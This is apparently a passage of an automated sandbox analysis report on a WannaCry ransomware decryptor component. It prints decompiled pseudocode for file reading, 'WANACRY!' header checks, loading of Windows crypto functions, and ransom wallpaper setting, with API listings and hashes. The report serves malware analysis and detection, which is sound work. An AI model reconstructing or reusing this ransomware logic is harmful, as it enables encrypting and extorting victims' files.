																			_v608 = _t137;
																			_v620 = _t137;
																			MoveFileW(_a4, _a8);
																		}
																		_t224 =  *(_t223 + 0x4d4);
																		__eflags = _t224;
																		if(_t224 != 0) {
																			 *_t224(_a4, _a8, _v568, _v572, 0, _v564);
																		}
																		_push(0xffffffff);
																		_push( &_v20);
																		L00413056();
																		 *[fs:0x0] = _v20;
																		return 1;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					_push(_t213);
					_push( &_v20);
					L33:
					L00413056();
					 *[fs:0x0] = _v20;
					return 0;
				}
				L41:
			}

0x004020a3
0x004020a5
0x004020aa
0x004020b5
0x004020b6
0x004020c5
0x004020c6
0x004020cc
0x004020cf
0x004020d5
0x004020dd
0x004020e0
0x004020e6
0x004020ef
0x004020f5
0x004020fc
0x00402102
0x00402108
0x0040210b
0x0040210e
0x00402114
0x0040212d
0x0040212f
0x00402137
0x00402159
0x0040216e
0x00402174
0x00402176
0x0040244c
0x0040244c
0x00402451
0x00000000
0x0040217c
0x0040218c
0x0040218e
0x00402190
0x00000000
0x00402196
0x004021a5
0x004021ab
0x004021ad
0x00000000
0x004021b3
0x004021b3
0x004021bd
0x00000000
0x004021c3
0x004021ce
0x004021dc
0x004021e2
0x004021e4
0x00000000
0x004021ea
0x004021fa
0x00402200
0x00402202
0x00000000
0x00402208
0x00402218
0x0040221e
0x00402220
0x00000000
0x00402226
0x00402226
0x0040222d
0x0040230f
0x00402315
0x00402317
0x0040231d
0x00402320
0x0040232f
0x00402336
0x00402345
0x00402348
0x0040234d
0x0040234f
0x0040238b
0x0040238b
0x0040238e
0x00402393
0x00402394
0x0040239a
0x004023a1
0x004023a2
0x004023ad
0x004023b6
0x004023b9
0x004023bc
0x004023be
0x00000000
0x00000000
0x004023c4
0x004023d1
0x004023d1
0x004023d7
0x004023d9
0x004023e0
0x004023f3
0x004023f9
0x004023fb
0x0040246f
0x0040246f
0x00402474
0x00000000
0x004023fd
0x004023fd
0x00402400
0x00402402
0x00000000
0x00402404
0x00402404
0x00402407
0x0040241c
0x0040241f
0x00402436
0x0040243c
0x0040243e
0x00000000
0x00402440
0x00402443
0x00402446
0x00000000
0x00000000
0x00000000
0x00000000
0x00402446
0x0040243e
0x00402402
0x004023db
0x004023db
0x004023de
0x00000000
0x00000000
0x00000000
0x00000000
0x004023de
0x004023c6
0x004023c9
0x004023cb
0x00000000
0x00000000
0x00000000
0x00000000
0x004023cb
0x00000000
0x004023c4
0x00402477
0x0040248a
0x00402491
0x00000000
0x00402351
0x00402354
0x0040235b
0x0040236a
0x0040236d
0x00402372
0x00402374
0x00402381
0x00000000
0x00000000
0x00000000
0x00000000
0x00402374
0x00402322
0x00402322
0x00402326
0x00000000
0x00402326
0x00402233
0x00402234
0x00402253
0x00402255
0x0040225b
0x0040225e
0x00000000
0x00402264
0x00402274
0x00402289
0x0040228f
0x00402291
0x00000000
0x00402297
0x00402297
0x0040229e
0x00000000
0x004022a4
0x004022ab
0x004022c0
0x004022c6
0x004022c8
0x00402376
0x00402376
0x0040237b
0x00000000
0x004022ce
0x004022ce
0x004022d5
0x00000000
0x004022db
0x004022e5
0x004022e8
0x004022ee
0x00402497
0x004024ad
0x004024b3
0x004024ba
0x004024c3
0x004024c3
0x004024c6
0x004024cc
0x004024da
0x004024da
0x004024e0
0x004024e6
0x004024e8
0x00402509
0x00402509
0x0040250b
0x00402510
0x00402511
0x00402521
0x0040252e
0x0040252e
0x004022d5
0x004022c8
0x0040229e
0x00402291
0x0040225e
0x0040222d
0x00402220
0x00402202
0x004021e4
0x004021bd
0x004021ad
0x00402190
0x00402139
0x00402139
0x0040213d
0x00402452
0x00402452
0x0040245f
0x0040246c
0x0040246c
0x00000000

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
CloseHandle.KERNEL32(00000000), ref: 00402234
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
_local_unwind2.MSVCRT ref: 00402452

Strings

WANACRY!, xrefs: 00402181

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: File$Read$Create$CloseHandlePointerTime_local_unwind2
String ID: WANACRY!
API String ID: 1586634678-1240840912
Opcode ID: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
Instruction ID: 3da7a8628a1c4a9b72cf23ccbc301ae3d1bdd94b5a24a93ab77a4db798f2c342
Opcode Fuzzy Hash: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
Instruction Fuzzy Hash: 91D14471A00214AFDB20DB64CC89FEBB7B8FB88710F14466AF619B61D0D7B49945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004035A0 Relevance: 36.2, APIs: 24, Instructions: 175
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004035A0(intOrPtr __ecx) {
				int _t51;
				void* _t54;
				long _t55;
				signed int _t64;
				signed int _t68;
				void* _t71;
				int _t78;
				short _t86;
				signed int _t92;
				intOrPtr _t110;
				int _t121;
				void* _t122;
				void* _t123;
				void* _t126;
				void* _t128;
				intOrPtr _t129;
				void* _t130;
				void* _t132;
				void* _t134;

				_push(0xffffffff);
				_push(E0041365C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t129;
				_t130 = _t129 - 0x2e4;
				_t110 = __ecx;
				 *((intOrPtr*)(_t130 + 0x28)) = __ecx;
				_t51 = SendMessageA( *(__ecx + 0x80), 0x1004, 0, 0);
				if(_t51 != 0) {
					_t51 = OpenClipboard( *(_t110 + 0x20));
					if(_t51 != 0) {
						_t121 = 0;
						_t126 = 0;
						if(SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0) > 0) {
							do {
								_push(0);
								_t71 = _t130 + 0x18;
								_push(_t121);
								_push(_t71);
								L00412D7C();
								_push(0x4206e0);
								_push(_t71);
								_push(_t130 + 0x14);
								 *(_t130 + 0x308) = 0;
								L00412CCE();
								 *(_t130 + 0x2fc) = 2;
								L00412CC2();
								 *(_t130 + 0x2fc) = 0xffffffff;
								_t126 = _t126 +  *( *(_t130 + 0x10) - 8) * 2;
								L00412CC2();
								_t121 = _t121 + 1;
							} while (_t121 < SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0));
						}
						_t122 = GlobalAlloc(2, _t126 + 2);
						 *(_t130 + 0x14) = _t122;
						if(_t122 != 0) {
							_t54 = GlobalLock(_t122);
							 *(_t130 + 0x10) = _t54;
							if(_t54 != 0) {
								_t78 = 0;
								_t128 = 0;
								_t55 = SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0);
								if(_t55 > 0) {
									while(1) {
										_push(0);
										_push(_t78);
										_push(_t130 + 0x24);
										L00412D7C();
										_push(0x4206e0);
										_push(_t55);
										 *((intOrPtr*)(_t130 + 0x304)) = 3;
										_push(_t130 + 0x24);
										L00412CCE();
										 *(_t130 + 0x2fc) = 5;
										L00412CC2();
										_t86 =  *0x42179c; // 0x0
										 *(_t130 + 0x24) = _t86;
										memset(_t130 + 0x26, 0, 0xb3 << 2);
										_t132 = _t130 + 0xc;
										asm("stosw");
										MultiByteToWideChar(0, 0,  *(_t132 + 0x1c), 0xffffffff, _t130 + 0x24, 0x167);
										_t64 = wcslen(_t132 + 0x24);
										_t123 = _t132 + 0x28;
										_t92 = _t64 << 1 >> 2;
										memcpy(_t123 + _t92 + _t92, _t123, memcpy( *((intOrPtr*)(_t132 + 0x14)) + _t128, _t123, _t92 << 2) & 0x00000003);
										_t134 = _t132 + 0x18;
										_t68 = wcslen(_t134 + 0x28);
										_t130 = _t134 + 8;
										_t128 = _t128 + _t68 * 2;
										 *(_t130 + 0x2fc) = 0xffffffff;
										L00412CC2();
										_t78 = _t78 + 1;
										_t55 = SendMessageA( *( *((intOrPtr*)(_t130 + 0x18)) + 0x80), 0x1004, 0, 0);
										if(_t78 >= _t55) {
											break;
										}
										_t110 =  *((intOrPtr*)(_t130 + 0x18));
									}
									_t122 =  *(_t130 + 0x14);
								}
								 *((short*)( *(_t130 + 0x10) + _t128)) = 0;
								GlobalUnlock(_t122);
								EmptyClipboard();
								SetClipboardData(0xd, _t122);
							} else {
								GlobalFree(_t122);
							}
						}
						_t51 = CloseClipboard();
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t130 + 0x2f4));
				return _t51;
			}

0x004035a0
0x004035a2
0x004035ad
0x004035ae
0x004035b5
0x004035c5
0x004035d7
0x004035db
0x004035df
0x004035e9
0x004035f1
0x004035fd
0x00403607
0x0040360d
0x0040360f
0x0040360f
0x00403611
0x00403615
0x00403616
0x0040361a
0x0040361f
0x00403628
0x00403629
0x0040362a
0x00403635
0x0040363e
0x00403646
0x00403653
0x00403661
0x00403665
0x0040367a
0x0040367d
0x0040360f
0x0040368d
0x00403691
0x00403695
0x0040369c
0x004036a4
0x004036a8
0x004036bc
0x004036c6
0x004036c8
0x004036d0
0x004036dc
0x004036dc
0x004036e2
0x004036e3
0x004036e7
0x004036ec
0x004036f1
0x004036f6
0x00403701
0x00403702
0x0040370b
0x00403713
0x00403718
0x00403721
0x00403733
0x00403733
0x00403735
0x00403748
0x00403753
0x00403763
0x0040376a
0x00403774
0x00403774
0x0040377b
0x00403781
0x00403788
0x0040378c
0x00403797
0x004037af
0x004037b1
0x004037b9
0x00000000
0x00000000
0x004036d8
0x004036d8
0x004037bf
0x004037bf
0x004037c8
0x004037ce
0x004037d4
0x004037dd
0x004036aa
0x004036ab
0x004036ab
0x004036a8
0x004037e3
0x004037e3
0x004035f1
0x004037f4
0x00403801

APIs

SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
OpenClipboard.USER32(?), ref: 004035E9
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
#3301.MFC42(?,00000000,00000000), ref: 0040361A
#924.MFC42 ref: 00403635
#800.MFC42 ref: 00403646
#800.MFC42 ref: 00403665
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
GlobalLock.KERNEL32(00000000), ref: 0040369C
GlobalFree.KERNEL32(00000000), ref: 004036AB
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
#3301.MFC42(?,00000000,00000000), ref: 004036E7
#924.MFC42(00000000), ref: 00403702
#800.MFC42(00000000), ref: 00403713
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
wcslen.MSVCRT ref: 00403753
wcslen.MSVCRT ref: 0040377B
#800.MFC42 ref: 00403797
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
GlobalUnlock.KERNEL32(00000000), ref: 004037CE
EmptyClipboard.USER32 ref: 004037D4
SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
CloseClipboard.USER32 ref: 004037E3

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#800ClipboardGlobal$#3301#924wcslen$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
String ID:
API String ID: 3405503685-0
Opcode ID: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
Instruction ID: c86228cefcec1f34603e32cf9825c4429cf2ad1f23db843e272d7cdac5f24a66
Opcode Fuzzy Hash: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
Instruction Fuzzy Hash: 0151E571204706ABD320DF64DC45FEBB7A8FB88754F10462DF249A72D0DB749909CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00403CB0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 122
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00403CB0(struct _WIN32_FIND_DATAA* __ecx) {
				void* _t31;
				int _t34;
				int _t37;
				intOrPtr _t39;
				int _t42;
				struct _WIN32_FIND_DATAA* _t54;
				void* _t75;
				struct _IO_FILE* _t76;
				struct _WIN32_FIND_DATAA* _t79;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t84;

				_t54 = __ecx;
				_t79 = __ecx;
				 *((intOrPtr*)(_t81 + 0xc)) = __ecx;
				_t31 = FindFirstFileA("*.res", _t81 + 0xcc);
				 *(_t81 + 8) = _t31;
				if(_t31 != 0xffffffff) {
					goto L3;
					L14:
					_t75 =  *(_t81 + 0x14);
					_t54 = _t81 + 0xdc;
					if(FindNextFileA(_t75, _t54) != 0) {
						L3:
						if(( *(_t81 + 0xdc) & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t54 | 0xffffffff) - 1 == 0xc) {
								_t34 = sscanf(_t81 + 0x108, "%08X.res", _t81 + 0x1c);
								_t81 = _t81 + 0xc;
								if(_t34 >= 1) {
									_t76 = fopen(_t81 + 0x108, "rb");
									_t81 = _t81 + 8;
									 *(_t81 + 0x18) = _t76;
									if(_t76 != 0) {
										_t37 = fread(_t81 + 0x5c, 0x88, 1, _t76);
										_t82 = _t81 + 0x10;
										if(_t37 == 1) {
											_t39 =  *((intOrPtr*)(_t82 + 0x1c));
											_t60 =  *((intOrPtr*)(_t82 + 0x5c));
											if( *((intOrPtr*)(_t82 + 0x5c)) == _t39) {
												if(_t39 != 0) {
													 *((char*)(_t82 + 0x21)) = 0x5c;
													 *((char*)(_t82 + 0x28)) = 0x5c;
													E00401C30(_t60, _t39, _t82 + 0x22);
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x143);
												} else {
													sprintf(_t82 + 0x20, "My Computer");
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x14a);
												}
												_t42 = SendMessageA( *(_t79 + 0xc0), ??, ??, ??);
												_push(0x88);
												L00412CEC();
												_t84 = _t83 + 4;
												memcpy(_t42, _t84 + 0x54, 0x22 << 2);
												_t82 = _t84 + 0xc;
												SendMessageA( *( *((intOrPtr*)(_t83 + 0x14)) + 0xc0), 0x151, _t42, _t42);
												_t76 =  *(_t82 + 0x18);
												_t79 =  *((intOrPtr*)(_t82 + 0x10));
											}
										}
										fclose(_t76);
										_t81 = _t82 + 4;
									}
								}
							}
						}
						goto L14;
					} else {
						FindClose(_t75);
						return 1;
					}
				} else {
					return 0;
				}
			}

0x00403cb0
0x00403cbe
0x00403cc6
0x00403cca
0x00403cd3
0x00403cd7
0x00403ceb
0x00403e1f
0x00403e1f
0x00403e23
0x00403e34
0x00403cec
0x00403cf4
0x00403d06
0x00403d0e
0x00403d26
0x00403d2c
0x00403d32
0x00403d4b
0x00403d4d
0x00403d52
0x00403d56
0x00403d69
0x00403d6f
0x00403d75
0x00403d7b
0x00403d7f
0x00403d85
0x00403d8d
0x00403db4
0x00403dbb
0x00403dc0
0x00403dc5
0x00403dcc
0x00403dcd
0x00403dcf
0x00403d8f
0x00403d99
0x00403d9f
0x00403da6
0x00403da7
0x00403da9
0x00403da9
0x00403ddb
0x00403ddd
0x00403de4
0x00403ded
0x00403dfc
0x00403dfc
0x00403e0b
0x00403e0d
0x00403e11
0x00403e11
0x00403d85
0x00403e16
0x00403e1c
0x00403e1c
0x00403d56
0x00403d32
0x00403d0e
0x00000000
0x00403e3a
0x00403e3b
0x00403e50
0x00403e50
0x00403cd9
0x00403ce2
0x00403ce2

APIs

FindFirstFileA.KERNEL32(*.res,?), ref: 00403CCA
sscanf.MSVCRT ref: 00403D26
fopen.MSVCRT ref: 00403D45
fread.MSVCRT ref: 00403D69
sprintf.MSVCRT ref: 00403D99
SendMessageA.USER32(?,00000143,00000000,?), ref: 00403DDB
#823.MFC42(00000088), ref: 00403DE4
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00403E0B
fclose.MSVCRT ref: 00403E16
FindNextFileA.KERNEL32(?,00000010), ref: 00403E2C
FindClose.KERNEL32(?), ref: 00403E3B

Strings

\, xrefs: 00403DBB
%08X.res, xrefs: 00403D20
My Computer, xrefs: 00403D93
*.res, xrefs: 00403CC1
\, xrefs: 00403DB4

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Find$FileMessageSend$#823CloseFirstNextfclosefopenfreadsprintfsscanf
String ID: %08X.res$*.res$My Computer$\$\
API String ID: 1476605332-298172004
Opcode ID: 97a695bc1a9f425159621aa26688142562d89307bea82b304c77383c11b419a6
Instruction ID: 8c176cb2dc152f679f03352499a178afa0a04d74b0fbd326e0cc20a81f44b8b1
Opcode Fuzzy Hash: 97a695bc1a9f425159621aa26688142562d89307bea82b304c77383c11b419a6
Instruction Fuzzy Hash: F741C671508300ABE710CB54DC45FEB7799EFC4715F404A2DF984A62C1E7B8EA498B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00404B70 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 62
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404B70() {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t20;

				if( *0x4217c0 == 0) {
					_t20 = LoadLibraryA("advapi32.dll");
					if(_t20 == 0) {
						L10:
						return 0;
					} else {
						 *0x4217c0 = GetProcAddress(_t20, "CryptAcquireContextA");
						 *0x4217c4 = GetProcAddress(_t20, "CryptImportKey");
						 *0x4217c8 = GetProcAddress(_t20, "CryptDestroyKey");
						 *0x4217cc = GetProcAddress(_t20, "CryptEncrypt");
						 *0x4217d0 = GetProcAddress(_t20, "CryptDecrypt");
						_t9 = GetProcAddress(_t20, "CryptGenKey");
						 *0x4217d4 = _t9;
						if( *0x4217c0 == 0 ||  *0x4217c4 == 0 ||  *0x4217c8 == 0 ||  *0x4217cc == 0 ||  *0x4217d0 == 0 || _t9 == 0) {
							goto L10;
						} else {
							return 1;
						}
					}
				} else {
					return 1;
				}
			}

0x00404b78
0x00404b8c
0x00404b90
0x00404c29
0x00404c2c
0x00404b96
0x00404bab
0x00404bb8
0x00404bc5
0x00404bd2
0x00404bdf
0x00404be4
0x00404bec
0x00404bf4
0x00000000
0x00404c22
0x00404c28
0x00404c28
0x00404bf4
0x00404b7a
0x00404b80
0x00404b80

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00402C46), ref: 00404B86
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404BA3
GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00404BB0
GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00404BBD
GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00404BCA
GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00404BD7
GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00404BE4

Strings

CryptAcquireContextA, xrefs: 00404B9D
advapi32.dll, xrefs: 00404B81
CryptImportKey, xrefs: 00404BA5
CryptDestroyKey, xrefs: 00404BB2
CryptEncrypt, xrefs: 00404BBF
CryptDecrypt, xrefs: 00404BCC
CryptGenKey, xrefs: 00404BD9

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
API String ID: 2238633743-2459060434
Opcode ID: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
Instruction ID: 00e3496518ad86b0ae3e163ac91477e164a9cb94f9785d2b2dfdbbcf4affa7e0
Opcode Fuzzy Hash: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
Instruction Fuzzy Hash: 441182B074635196D738AB67FD14AA726D4EFE1B01B85053BE401D3AB0C7B888028A9C

Uniqueness

Uniqueness Score: -1.00%

Function 00407E80 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 67
fileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00407E80() {
				void _v518;
				short _v520;
				short _v540;
				void _v1038;
				char _v1040;
				long _v1060;
				void _v1558;
				short _v1560;
				long _v1580;
				int _t23;
				short _t39;
				void* _t42;
				void* _t54;
				void* _t55;

				_t39 =  *0x42179c; // 0x0
				_v1040 = _t39;
				memset( &_v1038, 0, 0x81 << 2);
				asm("stosw");
				_v1560 = _t39;
				memset( &_v1558, 0, 0x81 << 2);
				asm("stosw");
				_v520 = _t39;
				memset( &_v518, 0, 0x81 << 2);
				asm("stosw");
				__imp__SHGetFolderPathW(0, 0, 0, 0,  &_v1040, _t42);
				_t23 = wcslen( &_v1060);
				_t54 =  &_v1560 + 0x28;
				if(_t23 != 0) {
					_push(L"@WanaDecryptor@.bmp");
					swprintf( &_v1580, L"%s\\%s",  &_v1060);
					_t55 = _t54 + 0x10;
					MultiByteToWideChar(0, 0, "b.wnry", 0xffffffff,  &_v540, 0x103);
					CopyFileW( &_v540, _t55, 0);
					return SystemParametersInfoW(0x14, 0, _t55, 1);
				} else {
					return _t23;
				}
			}

0x00407e86
0x00407e9c
0x00407ea4
0x00407ea6
0x00407eb3
0x00407eb8
0x00407eba
0x00407eca
0x00407ed2
0x00407ed4
0x00407ee6
0x00407ef4
0x00407efa
0x00407f00
0x00407f10
0x00407f20
0x00407f26
0x00407f41
0x00407f56
0x00407f73
0x00407f08
0x00407f08
0x00407f08

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
wcslen.MSVCRT ref: 00407EF4
swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67

Strings

b.wnry, xrefs: 00407F38
%s\%s, xrefs: 00407F1A
@WanaDecryptor@.bmp, xrefs: 00407F10

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: ByteCharCopyFileFolderInfoMultiParametersPathSystemWideswprintfwcslen
String ID: %s\%s$@WanaDecryptor@.bmp$b.wnry
API String ID: 13424474-2236924158
Opcode ID: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
Instruction ID: 08a18ced9c3675786ff634b79335ab73d5ba80fa93599351ce40df3d96d25247
Opcode Fuzzy Hash: 620144e10b90fbdcf7842e1a5c35e3d362372363debefcfb0e035a8d8bd61632
Instruction Fuzzy Hash: 7E21F075204304BAE36087A4CC05FE773AAAFD4700F508938B359961E1EAB16154875B

Uniqueness

Uniqueness Score: -1.00%

Function 004067F0 Relevance: 13.6, APIs: 9, Instructions: 71
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004067F0(void* __ecx) {
				signed int _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				int _t16;
				int _t21;
				int _t22;
				int _t37;
				struct tagRECT* _t48;
				void* _t56;

				_t56 = __ecx;
				_t16 = IsIconic( *(__ecx + 0x20));
				if(_t16 == 0) {
					L00412CBC();
					return _t16;
				} else {
					_push(_t56);
					L00412DD0();
					asm("sbb eax, eax");
					SendMessageA( *(_t56 + 0x20), 0x27,  ~( &_v88) & _v84, 0);
					_t21 = GetSystemMetrics(0xb);
					_t22 = GetSystemMetrics(0xc);
					_t48 =  &_v104;
					GetClientRect( *(_t56 + 0x20), _t48);
					asm("cdq");
					asm("cdq");
					_t37 = DrawIcon(_v84, _v96 - _v104 - _t21 + 1 - _v104 >> 1, _v92 - _v100 - _t22 + 1 - _t48 >> 1,  *(_t56 + 0x82c));
					L00412DB8();
					return _t37;
				}
			}

0x004067f4
0x004067fa
0x00406802
0x0040689c
0x004068a5
0x00406808
0x0040680a
0x0040680f
0x00406823
0x0040682b
0x00406839
0x0040683f
0x00406846
0x0040684c
0x00406866
0x00406879
0x00406884
0x0040688e
0x00406899
0x00406899

APIs

IsIconic.USER32(?), ref: 004067FA
#470.MFC42 ref: 0040680F
SendMessageA.USER32(?,00000027,?,00000000), ref: 0040682B
GetSystemMetrics.USER32(0000000B), ref: 00406839
GetSystemMetrics.USER32(0000000C), ref: 0040683F
GetClientRect.USER32(?,?), ref: 0040684C
DrawIcon.USER32(?,?,?,?), ref: 00406884
#755.MFC42 ref: 0040688E
#2379.MFC42 ref: 0040689C

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
String ID:
API String ID: 1397574227-0
Opcode ID: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
Instruction ID: db6533e43e067d2e1cb08ff7c7a85c8aaf9a8b82d3d45c58550572c7a5875683
Opcode Fuzzy Hash: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
Instruction Fuzzy Hash: 45117F712146069FC214DF38DD49DEBB7E9FBC8304F488A2DF58AC3290DA74E8058B95

Uniqueness

Uniqueness Score: -1.00%

